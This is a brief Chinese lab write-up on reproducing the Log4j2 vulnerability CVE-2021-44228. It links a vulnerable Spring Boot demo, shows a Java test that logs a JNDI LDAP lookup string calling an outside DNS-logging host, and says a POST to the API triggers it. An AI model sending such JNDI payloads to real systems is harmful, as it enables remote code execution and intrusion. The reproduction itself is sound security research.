CVE-2021-44228 log4j2 漏洞复现
环境搭建
https://github.com/bycuimiao/springboot2-log4j2-demo
下载下来。导入idea
然后新建一个test
package com.bycuimiao.demo; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; public class test { private static final Logger logger = LogManager.getRootLogger(); public static void main(final String... args) { logger.error("${jndi:ldap://0c22zc.dnslog.cn}"); } }
打包成了一个jar包。环
https://www.o2oxy.cn/wp-content/uploads/2021/12/1111.zip
直接jar -jar 启动即可
post api 接口即可触发
代码如下
https://www.o2oxy.cn/wp-content/uploads/2021/12/springboot2-log4j2-demo-master.zip
后续分析一下这个漏洞的产生